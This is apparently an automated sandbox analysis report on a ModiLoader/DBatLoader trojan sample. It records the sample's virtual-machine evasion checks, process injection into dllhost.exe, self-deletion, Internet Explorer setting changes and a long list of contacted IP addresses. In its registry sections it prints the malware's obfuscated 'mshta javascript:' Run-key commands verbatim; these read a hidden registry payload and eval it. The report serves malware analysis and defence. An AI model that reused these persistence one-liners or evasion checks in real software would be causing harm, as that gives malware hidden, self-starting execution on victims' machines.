Malware Analysis Report

2024-10-23 19:35

Sample ID 240506-mjsjfaha9t
Target 1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118
SHA256 1dd0bf89c416a276deb5bba33d65a8a0c5a5653e4f9d3178d6745313b1416f81
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1dd0bf89c416a276deb5bba33d65a8a0c5a5653e4f9d3178d6745313b1416f81

Threat Level: Known bad

The file 1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Looks for VMWare Tools registry key

Adds policy Run key to start application

Deletes itself

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-06 10:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-06 10:30

Reported

2024-05-06 10:32

Platform

win7-20240221-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\dllhost.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:mNmw6jW=\"Jwbps\";BH93=new%20ActiveXObject(\"WScript.Shell\");kwhqlnH1v=\"hMUG\";Z5t4hU=BH93.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\c41a571d\\\\a7204798\");YZFO5oo=\"daxo\";eval(Z5t4hU);oKkiA7m8F=\"LGi0QA\";" C:\Windows\SysWOW64\dllhost.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\dllhost.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\dllhost.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:tDEJbU0HS=\"zthRm4\";Kc5=new%20ActiveXObject(\"WScript.Shell\");NpoXb2Z=\"dRQm\";KX3i2f=Kc5.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\c41a571d\\\\a7204798\");RV7JqR5StF=\"MTZYHO\";eval(KX3i2f);LP5dDeh4=\"o\";" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:eWw29pof=\"DdpF\";ul4=new%20ActiveXObject(\"WScript.Shell\");G7fGbeU1X=\"LC4sVLIqkG\";Uz8mz=ul4.RegRead(\"HKCU\\\\software\\\\c41a571d\\\\a7204798\");QLFP7IP=\"K7huPQY\";eval(Uz8mz);fMEyq17XV=\"f\";" C:\Windows\SysWOW64\dllhost.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\dllhost.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\dllhost.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1972 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe C:\Windows\SysWOW64\dllhost.exe
PID 1972 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe C:\Windows\SysWOW64\dllhost.exe
PID 1972 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe C:\Windows\SysWOW64\dllhost.exe
PID 1972 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe C:\Windows\SysWOW64\dllhost.exe
PID 2812 wrote to memory of 2532 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2812 wrote to memory of 2532 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2812 wrote to memory of 2532 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2812 wrote to memory of 2532 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2532 wrote to memory of 2472 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2532 wrote to memory of 2472 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2532 wrote to memory of 2472 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2532 wrote to memory of 2472 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe
PID 2532 wrote to memory of 2292 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\explorer.exe
PID 2532 wrote to memory of 2292 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\explorer.exe
PID 2532 wrote to memory of 2292 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\explorer.exe
PID 2532 wrote to memory of 2292 N/A C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

dllhost.exe

C:\Windows\SysWOW64\dllhost.exe

"C:\Windows\SysWOW64\dllhost.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
CA 173.238.91.163:80 tcp
BR 128.251.82.137:80 tcp
US 76.51.61.120:80 tcp
US 146.143.33.144:443 tcp
US 8.8.8.8:53 microsoft.com udp
US 20.112.250.133:80 microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
BE 2.21.17.194:443 www.microsoft.com tcp
AU 1.135.49.165:80 tcp
MY 147.158.6.42:8080 tcp
CN 114.80.73.57:80 tcp
GB 25.212.143.178:8080 tcp
US 150.247.189.195:80 tcp
GB 25.155.245.218:80 tcp
US 134.138.212.158:80 tcp
US 97.99.222.228:80 tcp
BR 135.243.215.40:80 tcp
IT 185.14.76.108:80 tcp
US 68.118.120.17:80 tcp
US 70.42.62.125:80 tcp
US 34.102.102.68:8080 tcp
US 167.212.139.227:80 tcp
CN 117.155.195.226:80 tcp
CN 114.234.215.66:80 tcp
TW 203.66.143.178:80 tcp
US 28.26.42.201:80 tcp
US 104.72.127.179:80 tcp
GB 151.180.238.227:80 tcp
US 9.25.64.216:8080 tcp
US 143.20.74.133:80 tcp
US 30.67.59.60:80 tcp
US 165.111.248.150:8080 tcp
JP 150.11.205.172:80 tcp
US 6.176.247.210:80 tcp
SE 81.234.79.44:80 tcp
US 73.131.249.245:8080 tcp
GB 93.174.148.156:443 tcp
US 173.113.246.14:80 tcp
KR 222.113.245.73:80 tcp
IT 87.10.150.19:80 tcp
US 69.172.4.102:80 tcp
CN 120.213.64.220:80 tcp
AT 128.130.108.48:80 tcp
US 3.210.46.43:80 tcp
ES 81.40.214.205:80 tcp
N/A 127.203.121.182:80 tcp
IT 37.181.143.20:80 tcp
IR 95.162.110.191:80 tcp
US 167.6.55.155:80 tcp
GB 81.99.190.174:80 tcp
US 18.20.26.218:8080 tcp
SG 43.165.80.205:80 tcp
ES 77.224.12.154:80 tcp
US 11.81.198.228:80 tcp
CN 122.247.236.22:80 tcp
N/A 127.82.129.50:8080 tcp
AT 148.198.79.226:80 tcp
US 69.112.108.252:80 tcp
IN 223.182.40.78:80 tcp
US 165.124.48.195:80 tcp
CZ 78.156.158.216:80 tcp
KR 180.66.186.85:80 tcp
CN 183.131.66.66:80 tcp
MX 148.232.41.166:80 tcp
N/A 137.35.216.43:80 tcp
IT 109.114.255.236:80 tcp
DE 77.178.247.1:80 tcp
TW 223.138.205.17:8080 tcp
US 199.154.123.165:80 tcp
BR 54.94.249.83:80 tcp
TR 178.245.248.74:80 tcp
US 68.53.17.154:80 tcp
US 97.245.12.135:80 tcp
KR 210.108.46.194:80 tcp
ID 39.211.121.60:80 tcp
RO 85.123.142.172:80 tcp
CN 180.96.61.95:80 tcp
US 66.3.19.114:80 tcp
NL 145.164.119.200:443 tcp
US 19.255.177.157:80 tcp
JP 124.35.187.166:80 tcp
FR 90.56.119.198:80 tcp
US 174.163.95.20:80 tcp
JP 220.5.152.212:8080 tcp
GB 62.253.45.253:80 tcp
US 9.152.42.149:80 tcp
JP 153.149.157.214:80 tcp
US 43.219.227.49:80 tcp
US 155.37.223.91:8080 tcp
US 140.30.105.102:80 tcp
AR 186.136.92.226:80 tcp
US 100.29.220.148:80 tcp
IT 82.50.107.11:80 tcp
US 16.244.33.46:80 tcp
US 6.7.144.119:80 tcp
US 174.215.56.196:80 tcp
CN 180.187.6.69:80 tcp
US 73.213.44.235:80 tcp
HR 93.136.223.166:80 tcp
US 138.179.27.154:80 tcp
FI 178.213.239.206:80 tcp
CN 171.113.136.74:8080 tcp
US 130.169.56.95:80 tcp
DK 87.62.103.78:80 tcp
PT 95.136.102.55:80 tcp
RU 77.238.255.116:80 tcp
NL 74.234.224.105:80 tcp
AT 46.75.237.185:80 tcp
US 34.7.69.68:80 tcp
CN 182.140.144.147:80 tcp
US 47.181.82.194:80 tcp
CN 110.59.17.194:80 tcp
CA 142.238.58.247:80 tcp
GB 31.3.225.196:80 tcp
CN 113.111.174.137:80 tcp
CN 103.60.165.127:80 tcp
CN 220.187.216.58:80 tcp
DK 152.73.166.209:80 tcp
US 13.136.231.110:80 tcp
US 198.17.238.238:8080 tcp
US 143.151.153.177:80 tcp
DE 63.191.233.162:80 tcp
GB 213.1.113.112:80 tcp
US 22.67.33.44:8080 tcp
CH 94.100.157.182:80 tcp
US 69.142.71.48:80 tcp
US 72.24.182.18:80 tcp
CN 111.3.182.44:80 tcp
BR 135.221.243.220:443 tcp
BR 201.48.158.119:80 tcp
US 65.60.104.67:80 tcp
US 209.232.226.175:80 tcp
US 173.7.171.94:80 tcp
EG 196.141.29.49:80 tcp
N/A 127.199.113.73:80 tcp
JP 124.154.152.82:80 tcp
US 144.152.168.2:443 tcp
IN 122.176.202.221:80 tcp
US 166.155.240.227:80 tcp
ES 95.61.36.8:80 tcp
JP 133.80.191.125:80 tcp
KE 197.137.253.108:80 tcp
US 160.130.218.82:80 tcp
RU 213.142.60.194:80 tcp
US 155.51.82.212:80 tcp
IN 223.237.182.169:80 tcp
US 23.30.145.115:80 tcp
PH 119.94.44.9:443 tcp
JP 211.129.27.240:8080 tcp
RO 185.89.242.88:80 tcp
CN 120.45.62.149:80 tcp
KE 105.59.125.233:80 tcp
FR 109.6.101.63:80 tcp
PK 39.43.172.109:8080 tcp
KR 42.28.199.204:80 tcp
US 156.26.92.241:80 tcp
CA 64.231.216.185:443 tcp
US 21.152.210.106:80 tcp
JP 13.230.197.139:80 tcp
N/A 100.79.44.16:80 tcp
US 208.243.9.95:80 tcp
KR 220.76.119.190:80 tcp
FR 92.182.123.123:80 tcp
KR 106.245.97.246:8080 tcp
DE 51.189.146.194:80 tcp
KR 112.169.78.184:80 tcp
US 3.190.36.126:80 tcp
US 173.146.247.132:443 tcp
VE 190.76.130.123:80 tcp
JP 153.139.37.119:80 tcp
US 163.243.243.140:80 tcp
US 16.130.23.11:80 tcp
US 48.62.121.111:443 tcp
US 44.236.123.110:443 tcp
NL 144.43.168.203:80 tcp
IE 86.43.84.136:80 tcp
US 173.56.167.148:80 tcp
US 141.128.83.211:80 tcp
CA 155.10.207.171:80 tcp
DE 167.172.172.213:80 tcp
GB 25.23.107.109:443 tcp
US 136.87.8.140:80 tcp
US 204.139.53.28:80 tcp
NL 195.212.239.119:80 tcp
US 198.194.146.246:80 tcp
US 107.194.76.21:80 tcp
PL 81.168.190.4:80 tcp
US 143.226.220.144:80 tcp
US 207.118.90.24:80 tcp
US 159.71.32.136:80 tcp
CO 199.33.68.102:8080 tcp
US 15.40.76.170:80 tcp
CH 57.33.186.24:80 tcp
US 173.10.40.63:80 tcp
US 66.172.202.185:8080 tcp
US 55.199.202.63:80 tcp
NL 46.226.89.90:80 tcp
HK 20.255.112.67:80 tcp
CR 201.199.161.255:80 tcp
HK 20.255.112.67:80 20.255.112.67 tcp
IR 85.185.169.125:80 tcp
IT 79.5.17.82:80 tcp
IN 220.226.158.201:80 tcp
US 56.154.116.127:80 tcp
US 199.227.55.159:80 tcp
IN 147.139.116.195:80 tcp
US 47.47.235.91:80 tcp
CN 182.90.100.15:80 tcp
DE 217.82.179.37:80 tcp
KR 123.44.205.31:80 tcp
CN 123.188.118.43:80 tcp
US 184.36.116.146:443 tcp
US 8.23.103.233:80 tcp
GB 194.61.208.208:80 tcp
CA 99.208.64.9:80 tcp
US 34.139.148.153:8080 tcp
PL 212.76.46.184:80 tcp
US 75.207.39.53:80 tcp
CN 121.237.57.100:80 tcp
US 16.167.85.91:80 tcp
US 207.251.227.84:80 tcp
US 148.163.127.52:80 tcp
FR 91.171.102.34:80 tcp
RS 194.169.167.44:80 tcp
US 75.70.33.192:8080 tcp
US 166.172.73.123:80 tcp
AR 181.165.146.228:80 tcp
US 131.191.77.158:8080 tcp
US 29.242.43.165:8080 tcp
US 73.180.98.177:443 tcp
BR 179.168.126.141:80 tcp
N/A 10.41.192.229:80 tcp
DE 88.79.192.82:80 tcp

Files

memory/1972-0-0x00000000025B0000-0x0000000002C01000-memory.dmp

memory/1972-1-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1972-2-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1972-4-0x0000000000050000-0x0000000000114000-memory.dmp

memory/2812-8-0x0000000000600000-0x0000000000605000-memory.dmp

memory/2812-10-0x00000000000B0000-0x0000000000174000-memory.dmp

memory/1972-9-0x00000000025B0000-0x0000000002C01000-memory.dmp

memory/1972-7-0x0000000000400000-0x0000000000491000-memory.dmp

memory/1972-6-0x0000000000050000-0x0000000000114000-memory.dmp

memory/2532-14-0x0000000000600000-0x0000000000605000-memory.dmp

memory/2812-12-0x00000000000B0000-0x0000000000174000-memory.dmp

memory/2532-17-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-20-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-19-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-18-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-16-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-15-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-22-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-21-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-23-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-24-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-25-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2472-26-0x0000000000600000-0x0000000000605000-memory.dmp

memory/2472-27-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-32-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-30-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-29-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2472-28-0x0000000000120000-0x00000000001E4000-memory.dmp

memory/2532-41-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-39-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-38-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-37-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-36-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-34-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-33-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-40-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-35-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2292-42-0x00000000007C0000-0x0000000000A41000-memory.dmp

memory/2292-43-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-47-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-46-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-45-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-44-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2292-49-0x00000000000C0000-0x0000000000184000-memory.dmp

memory/2532-63-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-64-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-62-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-61-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-60-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-59-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-58-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-66-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-65-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-74-0x0000000000070000-0x0000000000134000-memory.dmp

memory/2532-75-0x0000000000070000-0x0000000000134000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab98BB.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar991B.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-06 10:30

Reported

2024-05-06 10:32

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c101db2daf76a3fd49172ed7855abfe_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\dllhost.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\dllhost.exe N/A
